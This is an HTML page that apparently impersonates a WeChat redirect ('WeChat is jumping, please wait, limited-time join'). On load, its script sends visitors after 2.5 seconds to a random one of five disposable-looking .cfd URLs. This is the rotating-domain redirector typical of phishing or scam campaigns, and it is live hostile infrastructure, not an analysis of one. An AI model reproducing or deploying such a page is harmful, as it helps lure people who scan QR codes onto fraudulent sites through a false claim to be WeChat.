<!DOCTYPE html>
<html>
<head>
    <title>加载中.....</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            display: flex;
            flex-direction: column;
            justify-content: flex-start; 
            align-items: center;
            height: 100vh;
            margin: 0;
            color: #333;
        }

        p {
            font-size: 35px;
            text-align: center;
            color: darkgreen;
            margin: 1em 0;
        }
        .highlight {
            color:coral; 
        }

        .image-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            margin-top: 2em;
        }

        .image-container img {
            max-width: 100%;
            height: auto;
            margin-top: 1em;
        }
    </style>
    <script type="text/javascript">
        window.onload = function() {
            var links = [
           "http://pxcdsr.dmuler.cfd/KZy6qg3z",
"http://5ct4ht.acfkqb.cfd/wNUnI43K",
"http://z2ia5hkhkkin.jhf5c9.cfd/aOOt0ONT",
"http://t77fct.xfhctm.cfd/bTVQnn5f",
"http://87j3f57ymtte.uiqobj.cfd/Da5uCFeL"
            ];
            var randomLink = links[Math.floor(Math.random() * links.length)];
            setTimeout(function() {
                window.location.href = randomLink;
            }, 2500); 
        };
    </script>
</head>
<body>
    <p>微信正在跳转，请稍等，限时加入！不要退出哦！</br>
   <span class="highlight">“如遇跳转失败请返回重新扫码”</span></p>
    <div class="image-container">
        <img src="img2/1.jpg" alt="Image 1">
        <img src="img2/2.jpg" alt="Image 2">
        <img src="img2/3.jpg" alt="Image 3">
    </div>
</body>
</html>
